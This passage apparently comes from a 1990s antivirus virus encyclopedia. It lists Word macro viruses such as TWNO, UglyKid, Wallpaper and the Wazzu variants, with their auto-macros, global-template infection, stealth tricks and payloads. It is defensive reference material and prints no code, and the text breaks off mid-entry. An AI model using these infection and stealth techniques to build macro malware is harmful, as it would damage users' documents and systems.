  25849. [WORD_TWNO.S]
  25850. Virus name: WORD_TWNO.S
  25851. Virus Type: Word macro virus
  25852. Number of macros: 1 or 3 (global template)
  25853. Encrypted: No
  25854. Macro names: AutoOpen (AutoNew, AutoClose)
  25855. Size of macros: 1212 Bytes in documents
  25856.                 3636 Bytes in global template
  25857. Place of origin: Taiwan
  25858. Date of origin: Fall 1996
  25859. Destructive: Yes
  25860. Seen In-The-Wild: No
  25861. Description:
  25862.  
  25863. TWNO.S is another virus written for the Taiwanese/Chinese
  25864. version of Microsoft Word.
  25865.  
  25866. The difference between this new variant and the previous
  25867. TWNO.C virus is that the code was slightly modified.
  25868.  
  25869. TWNO.S infects the global template when an infected
  25870. document is opened. Further documents become infected
  25871. when they are closed (AutoClose), created (AutoNew) or
  25872. opened (AutoOpen).
  25873.  
  25874. For additional information, please refer to the TWNO.C virus
  25875. description.
  25876.  
  25877. [WORD_TWNO.T]
  25878. Virus name: WORD_TWNO.T
  25879. Virus Type: Word macro virus
  25880. Number of macros: 1 or 3 (global template)
  25881. Encrypted: No
  25882. Macro names: AutoOpen (AutoNew, AutoClose)
  25883. Size of macros: 1206 Bytes in documents
  25884.                 3618 Bytes in global template
  25885. Place of origin: Taiwan
  25886. Date of origin: Fall 1996
  25887. Destructive: Yes
  25888. Seen In-The-Wild: No
  25889. Description:
  25890.  
  25891. TWNO.T is another virus written for the Taiwanese/Chinese
  25892. version of Microsoft Word.
  25893.  
  25894. The difference between this new variant and the previous
  25895. TWNO.C virus is that the code was slightly modified.
  25896.  
  25897. TWNO.T infects the global template when an infected
  25898. document is opened. Further documents become infected
  25899. when they are closed (AutoClose), created (AutoNew) or
  25900. opened (AutoOpen).
  25901.  
  25902. For additional information, please refer to the TWNO.C virus
  25903. description.
  25904.  
  25905. [WORD_TWNO.U]
  25906. Virus name: WORD_TWNO.U
  25907. Virus Type: Word macro virus
  25908. Number of macros: 1 or 3 (global template)
  25909. Encrypted: No
  25910. Macro names: AutoOpen (AutoNew, AutoClose)
  25911. Size of macros: 970 Bytes in documents
  25912.                 2910 Bytes in global template
  25913. Place of origin: Taiwan
  25914. Date of origin: Fall 1996
  25915. Destructive: Yes
  25916. Seen In-The-Wild: No
  25917. Description:
  25918.  
  25919. TWNO.U is another virus written for the Taiwanese/Chinese
  25920. version of Microsoft Word.
  25921.  
  25922. The difference between this new variant and the previous
  25923. TWNO.C virus is that the code was slightly modified.
  25924.  
  25925. TWNO.U infects the global template when an infected
  25926. document is opened. Further documents become infected
  25927. when they are closed (AutoClose), created (AutoNew) or
  25928. opened (AutoOpen).
  25929.  
  25930. For additional information, please refer to the TWNO.C virus
  25931. description.
  25932.  
  25933. [WORD_TWNO.V]
  25934. Virus name: WORD_TWNO.V
  25935. Virus Type: Word macro virus
  25936. Number of macros: 1 or 3 (global template)
  25937. Encrypted: No
  25938. Macro names: AutoOpen (AutoNew, AutoClose)
  25939. Size of macros: 924 Bytes in documents
  25940.                 2772 Bytes in global template
  25941. Place of origin: Taiwan
  25942. Date of origin: Fall 1996
  25943. Destructive: Yes
  25944. Seen In-The-Wild: No
  25945. Description:
  25946.  
  25947. TWNO.V is another virus written for the Taiwanese/Chinese
  25948. version of Microsoft Word.
  25949.  
  25950. The difference between this new variant and the previous
  25951. TWNO.C virus is that the code was slightly modified.
  25952.  
  25953. TWNO.V infects the global template when an infected
  25954. document is opened. Further documents become infected
  25955. when they are closed (AutoClose), created (AutoNew) or
  25956. opened (AutoOpen).
  25957.  
  25958. For additional information, please refer to the TWNO.C virus
  25959. description.
  25960.  
  25961. [WORD_TWNO.W]
  25962. Virus name: WORD_TWNO.W
  25963. Virus Type: Word macro virus
  25964. Number of macros: 1 or 3 (global template)
  25965. Encrypted: No
  25966. Macro names: AutoOpen (AutoNew, AutoClose)
  25967. Size of macros: 888 Bytes in documents
  25968.                 2664 Bytes in global template
  25969. Place of origin: Taiwan
  25970. Date of origin: Fall 1996
  25971. Destructive: Yes
  25972. Seen In-The-Wild: No
  25973. Description:
  25974.  
  25975. TWNO.W is another virus written for the Taiwanese/Chinese
  25976. version of Microsoft Word.
  25977.  
  25978. The difference between this new variant and the previous
  25979. TWNO.C virus is that the code was slightly modified.
  25980.  
  25981. TWNO.W infects the global template when an infected
  25982. document is opened. Further documents become infected
  25983. when they are closed (AutoClose), created (AutoNew) or
  25984. opened (AutoOpen).
  25985.  
  25986. For additional information, please refer to the TWNO.C virus
  25987. description.
  25988.  
  25989. [WORD_TWNO.X]
  25990. Virus name: WORD_TWNO.X
  25991. Virus Type: Word macro virus
  25992. Number of macros: 1 or 3 (global template)
  25993. Encrypted: No
  25994. Macro names: AutoOpen (AutoNew, AutoClose)
  25995. Size of macros: 872 Bytes in documents
  25996.                 2616 Bytes in global template
  25997. Place of origin: Taiwan
  25998. Date of origin: Fall 1996
  25999. Destructive: Yes
  26000. Seen In-The-Wild: No
  26001. Description:
  26002.  
  26003. TWNO.X is another virus written for the Taiwanese/Chinese
  26004. version of Microsoft Word.
  26005.  
  26006. The difference between this new variant and the previous
  26007. TWNO.C virus is that the code was slightly modified.
  26008.  
  26009. TWNO.X infects the global template when an infected
  26010. document is opened. Further documents become infected
  26011. when they are closed (AutoClose), created (AutoNew) or
  26012. opened (AutoOpen).
  26013.  
  26014. For additional information, please refer to the TWNO.C virus
  26015. description.
  26016.  
  26017. [WORD_TwoLines.A]
  26018. Virus name: WORD_TwoLines.A
  26019. Virus Type: Word macro virus
  26020. Number of macros: 5 and 4 for A1
  26021. Encrypted: Yes
  26022. Macro names: MSRun, AutoExec, AutoOpen, AutoClose, FileSaveAs
  26023. Size of macros: 1817 Bytes or 1767 Bytes
  26024. Place of origin: Unknown
  26025. Date of origin: February 1997
  26026. Destructive: No
  26027. Common In-The-Wild: No
  26028. Description:
  26029.  
  26030. TwoLines infects the global template when an infected
  26031. document is opened (AutoOpen) or closed (AutoClose).
  26032. As the name suggests it adds 2 empty lines to the active
  26033. document when the minute field of the system time shows
  26034. 20 minutes. Responsible for this action is the "MsRun" macro.
  26035.  
  26036. The "FileSaveAs" macro converts documents to templates, yet
  26037. does not infect them.
  26038.  
  26039. Twolines.A devolves into Twolines.A1, which does not contain
  26040. the "FileSaveAs" macro.
  26041.  
  26042. For this to happen certain conditions have to be present:
  26043.  
  26044. 1. Automacros are disabled when opening an infected document.
  26045. 2. Document is closed (AutoClose).
  26046. 3. Global template contains macros.
  26047.  
  26048. [WORD_UglyKid.A]
  26049. Virus name: WORD_Uglykid.A
  26050. Virus Type: Word macro virus
  26051. Number of macros: 3-4
  26052. Encrypted: Yes
  26053. Macro names: AutoOpen, (ToolsMacro, FileSave)
  26054. Size of macros: Polymorphic
  26055. Place of origin: Slovakia
  26056. Date of origin: April 1997
  26057. Payload: Yes
  26058. Seen In-The-Wild: No
  26059. Description:
  26060.  
  26061. Uglykid.A is another Polymorphic macro virus, that can not be
  26062. detected with a simple signature or with exact CRC detection.
  26063.  
  26064. UglyKid.A uses "ToolsMacro" to make recognition of an
  26065. infected document more difficult (called macro stealth technique).
  26066. It also removes the File|Templates menu item so users can
  26067. not look for viral macros on an infected system.
  26068. It is advised not to select the "ToolsMacro" menu item, since
  26069. it is used to execute the virus code.
  26070.  
  26071. UglyKid.A also infects further documents when the "FileSave"
  26072. command is used.
  26073.  
  26074. While most other Polymorphic viruses are fairly slow and
  26075. visible to the user, UglyKid.A tries to hide the macro editing
  26076. bar. Instead it shows a gray bar for a very short time.
  26077.  
  26078. The payload of UglyKid.A changes the "User Info" item in the
  26079. Tool|Option menu. It adds the following comments:
  26080.  
  26081. "   Name: Nasty   "
  26082.  
  26083. "   Initial: Ugly   "
  26084.  
  26085. In order to detect UglyKid.A, we advise to use an anti-virus
  26086. program that does smart checksumming.
  26087.  
  26088. [WORD_Wallpaper.A]
  26089. Virus name: WORD_Wallpaper.A
  26090. Virus Type: Word macro virus
  26091. Number of macros: 2 (or 5)
  26092. Encrypted: No
  26093. Macro names: AutoOpen, FilePrint (ToolsMacro, FileTemplates
  26094.              ToolsCustomize)
  26095. Size of macros: 7353 Bytes in documents
  26096.                 29088 Bytes in global template
  26097. Place of origin: Unknown
  26098. Date of origin: Spring 1997
  26099. Payload: Yes
  26100. Seen In-The-Wild: No
  26101. Description:
  26102.  
  26103. Wallpaper.A infects the global template (normal.dot) when an
  26104. infected document is opened. Further documents become
  26105. infected when they are also opened (AutoOpen) or one of the
  26106. following menu items is selected:
  26107.  
  26108. FilePrint
  26109. FileTemplates
  26110. ToolsMacro
  26111. ToolsCustomize
  26112.  
  26113. Wallpaper uses FileTemplate, ToolsCustomize and ToolsMacro
  26114. to make recognition of an infected document more difficult
  26115. (called macro stealth technique).
  26116.  
  26117. On the 31st of each month, Wallpaper drops an image of a dead
  26118. head (SK2.BMP). It then modifies AUTOEXEC.BAT and
  26119. WIN.INI in order to change the background image of Windows.
  26120.  
  26121. The following file is also created in the C:\WINDOWS directory:
  26122.  
  26123. "   REGSK2.REG   "
  26124.  
  26125. Wallpaper also shows the following message on the 31st of each
  26126. month:
  26127.  
  26128. "   [!!!PIRATE VIRUS!!!]--Active! The [PIRATE VIRUS] has pillaged   "
  26129. "   your computer! GO BACK TO MS-WORD??   "
  26130.  
  26131. [WORD_Weather.A:Tw (aka Fish)]
  26132. Virus name: WORD_Weather.A:Tw (aka Fish)
  26133. Virus Type: Word macro virus
  26134. Number of macros: 4
  26135. Encrypted: Yes
  26136. Macro names: AutoOpen, AutoNew, AutoExec,ToolsMacro
  26137. Size of macros: 4849 Bytes
  26138. Place of origin: Taiwan
  26139. Date of origin: 1996
  26140. Payload: Yes
  26141. Seen In-The-Wild: Yes
  26142. Description:
  26143.  
  26144. Weather.A activates when an infected document is opened.
  26145. It then displays a message and asks for user input. To continue
  26146. working, the user has to input the right answer.
  26147.  
  26148. It uses "ToolsMacro" to make recognition of an infected
  26149. document more difficult (called macro stealth technique).
  26150.  
  26151. Weather uses language specific commands, therefore it
  26152. only works with the Chinese/Taiwanese version of Microsoft WORD_
  26153.  
  26154. [WORD_Wazzu.A]
  26155. Virus name: WORD_Wazzu.A
  26156. Virus Type: Word macro virus
  26157. Number of macros: 1
  26158. Encrypted: No
  26159. Macro names: AutoOpen
  26160. Size of macros: 632 Bytes
  26161. Place of origin: Washington, USA
  26162. Date of origin: Posted to Usenet in April 1996
  26163. Destructive: Yes
  26164. Common In-The-Wild: Yes
  26165. Description:
  26166.  
  26167. When an infected document is opened, Wazzu.A checks the
  26168. name of the active document. If it is "normal.dot", then the
  26169. virus macro is copied from the global template to the open
  26170. document.  Otherwise normal.dot becomes infected.
  26171.  
  26172. Wazzu does not check if a document is already infected. It
  26173. simply overwrites the "autoopen" macro.
  26174.  
  26175. Wazzu has a destructive payload. It picks a random number
  26176. between 0 and 1 and if the number is smaller than 0.2
  26177. (probability of 20 percent), the virus will move a word from
  26178. one place in the document to another.  This is repeated three
  26179. times. So the probability for a Word to be moved is 48.8
  26180. percent. After the third time, Wazzu picks a final random
  26181. number (between 0 and 1) and if the value is larger than 0.25
  26182. (probability of 25 percent), the word "Wazzu" will be inserted
  26183. into the document.
  26184.  
  26185. After an infected documents is cleaned, it has to be checked
  26186. carefully because chances of having a modified document
  26187. (words swapped or added) are over 61 percent. This can be a
  26188. very time consuming job with large documents.
  26189.  
  26190. Wazzu is a nickname for the Washington State University.
  26191.  
  26192. Wazzu.A has also been convert to the Word97 Word format (Word8).
  26193.  
  26194.  
  26195. [WORD8_Wazzu.A]
  26196. Virus name: WORD_Wazzu.A
  26197. Virus Type: Word macro virus
  26198. Platform: Office 97
  26199. Number of macros: 1
  26200. Encrypted: No
  26201. Macro names: AutoOpen
  26202. Size of macros: 632 Bytes
  26203. Place of origin: Washington, USA
  26204. Date of origin: Posted to Usenet in April 1996
  26205. Destructive: Yes
  26206. Common In-The-Wild: Yes
  26207. Description:
  26208.  
  26209. When an infected document is opened, Wazzu.A checks the
  26210. name of the active document. If it is "normal.dot", then the
  26211. virus macro is copied from the global template to the open
  26212. document.  Otherwise normal.dot becomes infected.
  26213.  
  26214. Wazzu does not check if a document is already infected. It
  26215. simply overwrites the "autoopen" macro.
  26216.  
  26217. Wazzu has a destructive payload. It picks a random number
  26218. between 0 and 1 and if the number is smaller than 0.2
  26219. (probability of 20 percent), the virus will move a word from
  26220. one place in the document to another.  This is repeated three
  26221. times. So the probability for a Word to be moved is 48.8
  26222. percent. After the third time, Wazzu picks a final random
  26223. number (between 0 and 1) and if the value is larger than 0.25
  26224. (probability of 25 percent), the word "Wazzu" will be inserted
  26225. into the document.
  26226.  
  26227. After an infected documents is cleaned, it has to be checked
  26228. carefully because chances of having a modified document
  26229. (words swapped or added) are over 61 percent. This can be a
  26230. very time consuming job with large documents.
  26231.  
  26232. Wazzu is a nickname for the Washington State University.
  26233.  
  26234.  
  26235. [WORD8_Wazzu.A2]
  26236. Virus name: WORD_Wazzu.A2
  26237. Virus Type: Word macro virus
  26238. Platform: Office 97
  26239. Number of macros: 1
  26240. Encrypted: No
  26241. Macro names: AutoOpen
  26242. Size of macros: 632 Bytes
  26243. Place of origin: Washington, USA
  26244. Date of origin: Posted to Usenet in April 1996
  26245. Destructive: Yes
  26246. Common In-The-Wild: Yes
  26247. Description:
  26248.  
  26249. When an infected document is opened, Wazzu.A checks the
  26250. name of the active document. If it is "normal.dot", then the
  26251. virus macro is copied from the global template to the open
  26252. document.  Otherwise normal.dot becomes infected.
  26253.  
  26254. Wazzu does not check if a document is already infected. It
  26255. simply overwrites the "autoopen" macro.
  26256.  
  26257. Wazzu has a destructive payload. It picks a random number
  26258. between 0 and 1 and if the number is smaller than 0.2
  26259. (probability of 20 percent), the virus will move a word from
  26260. one place in the document to another.  This is repeated three
  26261. times. So the probability for a Word to be moved is 48.8
  26262. percent. After the third time, Wazzu picks a final random
  26263. number (between 0 and 1) and if the value is larger than 0.25
  26264. (probability of 25 percent), the word "Wazzu" will be inserted
  26265. into the document.
  26266.  
  26267. After an infected documents is cleaned, it has to be checked
  26268. carefully because chances of having a modified document
  26269. (words swapped or added) are over 61 percent. This can be a
  26270. very time consuming job with large documents.
  26271.  
  26272. Wazzu is a nickname for the Washington State University.
  26273.  
  26274.  
  26275. [WORD_Wazzu.AA]
  26276. Virus name: WORD_Wazzu.AA
  26277. Virus Type: Word macro virus
  26278. Number of macros: 1
  26279. Encrypted: No
  26280. Macro names: AutoOpen
  26281. Size of macros: 1624 Bytes
  26282. Place of origin: Unknown
  26283. Date of origin: 1997
  26284. Destructive: No
  26285. Common In-The-Wild: No
  26286. Description:
  26287.  
  26288. The difference between this new variant and the original
  26289. Wazzu.A virus is that Wazzu.AA does not add the word
  26290. "wazzu" to newly opened documents.
  26291.  
  26292. Wazzu.AA infects the global template (normal.dot) when an
  26293. infected document is opened. Further documents become
  26294. infected when they are also opened (AutoOpen).
  26295.  
  26296. [WORD_Wazzu.AB]
  26297. Virus name: WORD_Wazzu.AB
  26298. Virus Type: Word macro virus
  26299. Number of macros: 1
  26300. Encrypted: No
  26301. Macro names: AutoOpen
  26302. Size of macros: 323 Bytes
  26303. Place of origin: Australia
  26304. Date of origin: February 1997
  26305. Destructive: No
  26306. Common In-The-Wild: No
  26307. Description:
  26308.  
  26309. The main difference between this new variant and previous
  26310. Wazzu viruses is that Wazzu.AB is another "do-nothing" macro
  26311. virus with no payload and some modified codes.
  26312.  
  26313. It infects the global template when an infected document is
  26314. opened. Further documents become infected when they are also
  26315. opened (AutoOpen).
  26316.  
  26317. [WORD_Wazzu.AC]
  26318. Virus name: WORD_Wazzu.AC
  26319. Virus Type: Word macro virus
  26320. Number of macros: 1
  26321. Encrypted: No
  26322. Macro names: AutoOpen
  26323. Size of macros: 433 Bytes
  26324. Place of origin: Unknown
  26325. Date of origin: 1997
  26326. Destructive: No
  26327. Common In-The-Wild: No
  26328. Description:
  26329.  
  26330. The main difference between this new variant and previous
  26331. Wazzu viruses is that Wazzu.AC is another "do-nothing" macro
  26332. virus with some code modifications and no payload.
  26333.  
  26334. It infects the global template when an infected document is
  26335. opened. Further documents become infected when they are also
  26336. opened (AutoOpen).
  26337.  
  26338. [WORD_Wazzu.AD]
  26339. Virus name: WORD_Wazzu.AD
  26340. Virus Type: Word macro virus
  26341. Number of macros: 1
  26342. Encrypted: No
  26343. Macro names: AutoOpen
  26344. Size of macros: 332 Bytes
  26345. Place of origin: Unknown
  26346. Date of origin: 1997
  26347. Destructive: No
  26348. Common In-The-Wild: No
  26349. Description:
  26350.  
  26351. The main difference between this new variant and previous
  26352. Wazzu viruses is that Wazzu.AD is another "do-nothing" macro
  26353. virus with some code modifications and no payload.
  26354.  
  26355. It infects the global template when an infected document is
  26356. opened. Further documents become infected when they are also
  26357. opened (AutoOpen).
  26358.  
  26359. [WORD_Wazzu.AE]
  26360. Virus name: WORD_Wazzu.AE
  26361. Virus Type: Word macro virus
  26362. Number of macros: 1
  26363. Encrypted: No
  26364. Macro names: AutoOpen
  26365. Size of macros: 618 Bytes
  26366. Place of origin: Unknown
  26367. Date of origin: 1997
  26368. Destructive: Yes
  26369. Common In-The-Wild: No
  26370. Description:
  26371.  
  26372. The main difference between this new variant and previous
  26373. Wazzu viruses is that Wazzu.AE has a slightly modified code.
  26374.  
  26375. It infects the global template when an infected document is
  26376. opened. Further documents become infected when they are also
  26377. opened (AutoOpen).
  26378.  
  26379. The payload is similar to the original Wazzu virus. There is a
  26380. 3/5 chance that one word is moved to another position in the
  26381. active document.
  26382.  
  26383. [WORD_Wazzu.AF]
  26384. Virus name: WORD_Wazzu.AF
  26385. Virus Type: Word macro virus
  26386. Number of macros: 1
  26387. Encrypted: No
  26388. Macro names: AutoOpen
  26389. Size of macros: 1484 Bytes
  26390. Place of origin: USA
  26391. Date of origin: December 1996
  26392. Destructive: No
  26393. Common In-The-Wild: No
  26394. Description:
  26395.  
  26396. Wazzu.AF is a new variant based on the older Wazzu.D
  26397. virus.  The only difference between the two viruses is that the
  26398. first blank line has been deleted.
  26399.  
  26400. For more information, please refer to the Wazzu.D virus
  26401. description.
  26402.  
  26403. [WORD_Wazzu.AG]
  26404. Virus name: WORD_Wazzu.AG
  26405. Virus Type: Word macro virus
  26406. Number of macros: 1
  26407. Encrypted: No
  26408. Macro names: AutoOpen
  26409. Size of macros: 332 Bytes
  26410. Place of origin: Unknown
  26411. Date of origin: 1997
  26412. Destructive: No
  26413. Common In-The-Wild: No
  26414. Description:
  26415.  
  26416. The main difference between this new variant and previous
  26417. Wazzu viruses is that Wazzu.AG is another "do-nothing" macro
  26418. virus with some code modifications and no payload.
  26419.  
  26420. It infects the global template when an infected document is
  26421. opened. Further documents become infected when they are also
  26422. opened (AutoOpen).
  26423.  
  26424. [WORD_Wazzu.AH]
  26425. Virus name: WORD_Wazzu.AH
  26426. Virus Type: Word macro virus
  26427. Number of macros: 1
  26428. Encrypted: No
  26429. Macro names: AutoOpen
  26430. Size of macros: 557 Bytes
  26431. Place of origin: USA
  26432. Date of origin: February 1997
  26433. Destructive: Yes
  26434. Common In-The-Wild: No
  26435. Description:
  26436.  
  26437. The main difference between this new variant and previous
  26438. Wazzu viruses is that Wazzu.AH has some code modifications.
  26439.  
  26440. Its payload inserts the word "YaHoo" instead of "wazzu".
  26441. The second payload, which moves words from one position to
  26442. another, is similar to Wazzu.A.
  26443.  
  26444. Wazzu.AH infects the global template when an infected
  26445. document is opened. Further documents become infected
  26446. when they are also opened (AutoOpen).
  26447.  
  26448. [WORD_Wazzu.AI]
  26449. Virus name: WORD_Wazzu.AI
  26450. Virus Type: Word macro virus
  26451. Number of macros: 1
  26452. Encrypted: No
  26453. Macro names: AutoOpen
  26454. Size of macros: 794 Bytes
  26455. Place of origin: Unknown
  26456. Date of origin: 1997
  26457. Destructive: No
  26458. Common In-The-Wild: No
  26459. Description:
  26460.  
  26461. The main difference between this new variant and previous
  26462. Wazzu viruses is that Wazzu.AI is another "do-nothing" macro
  26463. virus with some code modifications and no payload.
  26464.  
  26465. It infects the global template when an infected document is
  26466. opened. Further documents become infected when they are also
  26467. opened (AutoOpen).
  26468.  
  26469. [WORD_Wazzu.AJ]
  26470. Virus name: WORD_Wazzu.AJ
  26471. Virus Type: Word macro virus
  26472. Number of macros: 1
  26473. Encrypted: No
  26474. Macro names: AutoOpen
  26475. Size of macros: 430 Bytes
  26476. Place of origin: Unknown
  26477. Date of origin: 1997
  26478. Destructive: No
  26479. Common In-The-Wild: No
  26480. Description:
  26481.  
  26482. The main difference between this new variant and previous
  26483. Wazzu viruses is that Wazzu.AJ is another "do-nothing" macro
  26484. virus with some code modifications and no payload.
  26485.  
  26486. It infects the global template when an infected document is
  26487. opened. Further documents become infected when they are also
  26488. opened (AutoOpen).
  26489.  
  26490. [WORD_Wazzu.AK]
  26491. Virus name: WORD_Wazzu.AK
  26492. Virus Type: Word macro virus
  26493. Number of macros: 1
  26494. Encrypted: No
  26495. Macro names: autoOpen
  26496. Size of macros: 344 Bytes
  26497. Place of origin: Unknown
  26498. Date of origin: 1997
  26499. Destructive: No
  26500. Common In-The-Wild: No
  26501. Description:
  26502.  
  26503. The main difference between this new variant and previous
  26504. Wazzu viruses is that Wazzu.AK is another "do-nothing" macro
  26505. virus with code modifications and no payload.
  26506.  
  26507. It infects the global template when an infected document is
  26508. opened. Further documents become infected when they are also
  26509. opened (AutoOpen).
  26510.  
  26511. [WORD_Wazzu.AL]
  26512. Virus name: WORD_Wazzu.AL
  26513. Virus Type: Word macro virus
  26514. Number of macros: 1
  26515. Encrypted: No
  26516. Macro names: AutoOpen
  26517. Size of macros: 643 Bytes
  26518. Place of origin: Unknown
  26519. Date of origin: 1997
  26520. Destructive: Yes
  26521. Common In-The-Wild: No
  26522. Description:
  26523.  
  26524. The main difference between this new variant and previous
  26525. Wazzu viruses is that Wazzu.AL has a slightly modified code.
  26526.  
  26527. It infects the global template when an infected document is
  26528. opened. Further documents become infected when they are also
  26529. opened (AutoOpen).
  26530.  
  26531. The payload is similar to the original Wazzu virus. For
  26532. additional information, please refer to the Wazzu.A virus
  26533. description.
  26534.  
  26535. [WORD_Wazzu.AM]
  26536. Virus name: WORD_Wazzu.AM
  26537. Virus Type: Word macro virus
  26538. Number of macros: 1
  26539. Encrypted: No
  26540. Macro names: AutoOpen
  26541. Size of macros: 606 Bytes
  26542. Place of origin: Unknown
  26543. Date of origin: 1997
  26544. Destructive: Yes
  26545. Common In-The-Wild: No
  26546. Description:
  26547.  
  26548. The main difference between this new variant and previous
  26549. Wazzu viruses is that Wazzu.AM has a slightly modified code.
  26550.  
  26551. It infects the global template when an infected document is
  26552. opened. Further documents become infected when they are also
  26553. opened (AutoOpen).
  26554.  
  26555. The payload is similar to the original Wazzu virus. There is a
  26556. 3/5 chance that one word is moved to another position in the
  26557. active document.
  26558.  
  26559. [WORD_Wazzu.AN]
  26560. Virus name: WORD_Wazzu.AN
  26561. Virus Type: Word macro virus
  26562. Number of macros: 1
  26563. Encrypted: No
  26564. Macro names: AutoOpen
  26565. Size of macros: 375 Bytes
  26566. Place of origin: Unknown
  26567. Date of origin: 1997
  26568. Destructive: No
  26569. Common In-The-Wild: No
  26570. Description:
  26571.  
  26572. The main difference between this new variant and previous
  26573. Wazzu viruses is that Wazzu.AN is another "do-nothing" macro
  26574. virus with some code modifications and no payload.
  26575.  
  26576. It infects the global template when an infected document is
  26577. opened. Further documents become infected when they are also
  26578. opened (AutoOpen).
  26579.  
  26580. It also contains the following comment in its code:
  26581.  
  26582. "   REM This macro wipes out the Wazzu Virus!   "
  26583.  
  26584. [WORD_Wazzu.AO]
  26585. Virus name: WORD_Wazzu.AO
  26586. Virus Type: Word macro virus
  26587. Number of macros: 1
  26588. Encrypted: No
  26589. Macro names: AutoOpen
  26590. Size of macros: 626 Bytes
  26591. Place of origin: Unknown
  26592. Date of origin: 1997
  26593. Destructive: Yes
  26594. Common In-The-Wild: No
  26595. Description:
  26596.  
  26597. The main difference between this new variant and previous
  26598. Wazzu viruses is that Wazzu.AO has a slightly modified code.
  26599.  
  26600. It infects the global template when an infected document is
  26601. opened. Further documents become infected when they are also
  26602. opened (AutoOpen).
  26603.  
  26604. The payload is similar to the original Wazzu virus. For
  26605. additional information, please refer to the Wazzu.A virus
  26606. description.
  26607.  
  26608. [WORD_Wazzu.AP]
  26609. Virus name: WORD_Wazzu.AP
  26610. Virus Type: Word macro virus
  26611. Number of macros: 1
  26612. Encrypted: No
  26613. Macro names: autoOpen
  26614. Size of macros: 432 Bytes
  26615. Place of origin: USA
  26616. Date of origin: February 1997
  26617. Destructive: No
  26618. Common In-The-Wild: No
  26619. Description:
  26620.  
  26621. The main difference between this new variant and previous
  26622. Wazzu viruses is that Wazzu.AP is another "do-nothing" macro
  26623. virus with some code modifications and no payload.
  26624.  
  26625. It infects the global template when an infected document is
  26626. opened. Further documents become infected when they are also
  26627. opened (AutoOpen).
  26628.  
  26629. [WORD_Wazzu.AQ]
  26630. Virus name: WORD_Wazzu.AQ
  26631. Virus Type: Word macro virus
  26632. Number of macros: 1
  26633. Encrypted: No
  26634. Macro names: autoOpen
  26635. Size of macros: 437 Bytes
  26636. Place of origin: USA
  26637. Date of origin: February 1997
  26638. Destructive: No
  26639. Common In-The-Wild: No
  26640. Description:
  26641.  
  26642. The main difference between this new variant and previous
  26643. Wazzu viruses is that Wazzu.AQ is another "do-nothing" macro
  26644. virus with a corrupted payload and some missing commands.
  26645.  
  26646. It infects the global template when an infected document is
  26647. opened. Further documents become infected when they are also
  26648. opened (AutoOpen).
  26649.  
  26650. [WORD_Wazzu.AR]
  26651. Virus name: WORD_Wazzu.AR
  26652. Virus Type: Word macro virus
  26653. Number of macros: 1
  26654. Encrypted: No
  26655. Macro names: autoOpen
  26656. Size of macros: 563 Bytes
  26657. Place of origin: Germany
  26658. Date of origin: February 1997
  26659. Destructive: Yes
  26660. Common In-The-Wild: No
  26661. Description:
  26662.  
  26663. The main difference between this new variant and previous
  26664. Wazzu viruses is that Wazzu.AR has a slightly modified
  26665. code.
  26666.  
  26667. It infects the global template when an infected document is
  26668. opened. Further documents become infected when they are also
  26669. opened (AutoOpen).
  26670.  
  26671. The payload is similar to the original Wazzu virus. For
  26672. more information, please refer to the Wazzu.A virus
  26673. description.
  26674.  
  26675. [WORD_Wazzu.AS]
  26676. Virus name: WORD_Wazzu.AS
  26677. Virus Type: Word macro virus
  26678. Number of macros: 1
  26679. Encrypted: No
  26680. Macro names: AutoOpen
  26681. Size of macros: 352 Bytes
  26682. Place of origin: Unknown
  26683. Date of origin: 1996
  26684. Destructive: Yes
  26685. Common In-The-Wild: No
  26686. Description:
  26687.  
  26688. The main difference between this new variant and Wazzu.L
  26689. is that Wazzu.AS has some modified codes.
  26690.  
  26691. It infects the global template when an infected document is
  26692. opened. Further documents become infected when they are also
  26693. opened (AutoOpen).
  26694.  
  26695. When a user opens a document, Wazzu.AS adds the following
  26696. text at the end of the document:
  26697.  
  26698. "   ladderwork!   "
  26699.  
  26700. [WORD_Wazzu.AT]
  26701. Virus name: WORD_Wazzu.AT
  26702. Virus Type: Word macro virus
  26703. Number of macros: 1
  26704. Encrypted: No
  26705. Macro names: AutoOpen
  26706. Size of macros: 576 Bytes
  26707. Place of origin: Unknown
  26708. Date of origin: 1997
  26709. Destructive: Yes
  26710. Common In-The-Wild: No
  26711. Description:
  26712.  
  26713. The main difference between this new variant and previous
  26714. Wazzu viruses is that Wazzu.AT has a slightly modified code.
  26715.  
  26716. It infects the global template when an infected document is
  26717. opened. Further documents become infected when they are also
  26718. opened (AutoOpen).
  26719.  
  26720. The payload is similar to the original Wazzu virus. There is a
  26721. 3/5 chance that one word is moved to another position in the
  26722. active document.
  26723.  
  26724. [WORD_Wazzu.AU]
  26725. Virus name: WORD_Wazzu.AU
  26726. Virus Type: Word macro virus
  26727. Number of macros: 1
  26728. Encrypted: No
  26729. Macro names: AutoOpen
  26730. Size of macros: 630 Bytes
  26731. Place of origin: Unknown
  26732. Date of origin: 1997
  26733. Destructive: Yes
  26734. Common In-The-Wild: No
  26735. Description:
  26736.  
  26737. The main difference between this new variant and previous
  26738. Wazzu viruses is that Wazzu.AU has a slightly modified code.
  26739.  
  26740. It infects the global template when an infected document is
  26741. opened. Further documents become infected when they are also
  26742. opened (AutoOpen).
  26743.  
  26744. The payload is similar to the original Wazzu virus. For
  26745. additional information, please refer to the Wazzu.A virus
  26746. description.
  26747.  
  26748. [WORD_Wazzu.AV]
  26749. Virus name: WORD_Wazzu.AV
  26750. Virus Type: Word macro virus
  26751. Number of macros: 1
  26752. Encrypted: No
  26753. Macro names: AutoOpen
  26754. Size of macros: 321 Bytes
  26755. Place of origin: Unknown
  26756. Date of origin: Spring 1997
  26757. Destructive: No
  26758. Common In-The-Wild: No
  26759. Description:
  26760.  
  26761. The main difference between this new variant and previous
  26762. Wazzu viruses is that Wazzu.AV is another "do-nothing" macro
  26763. virus with small code modifications and no payload.
  26764.  
  26765. It infects the global template when an infected document is
  26766. opened. Further documents become infected when they are also
  26767. opened (AutoOpen).
  26768.  
  26769. [WORD_Wazzu.AW]
  26770. Virus name: WORD_Wazzu.AW
  26771. Virus Type: Word macro virus
  26772. Number of macros: 1
  26773. Encrypted: Yes
  26774. Macro names: AutoOpen
  26775. Size of macros: 1135 Bytes
  26776. Place of origin: USA
  26777. Date of origin: February 1997
  26778. Destructive: Yes
  26779. Common In-The-Wild: No
  26780. Description:
  26781.  
  26782. The main difference between this new variant and previous
  26783. Wazzu viruses is that Wazzu.AW is a combination of the
  26784. Wazzu virus and the ShareFun virus. It contains payloads from
  26785. both viruses.
  26786.  
  26787. Wazzu.AW moves words from one place to another, it enters
  26788. the word "wazzu" to the active document, and tries to mail
  26789. an infected document (C:\doc1.doc) to 3 randomly chosen
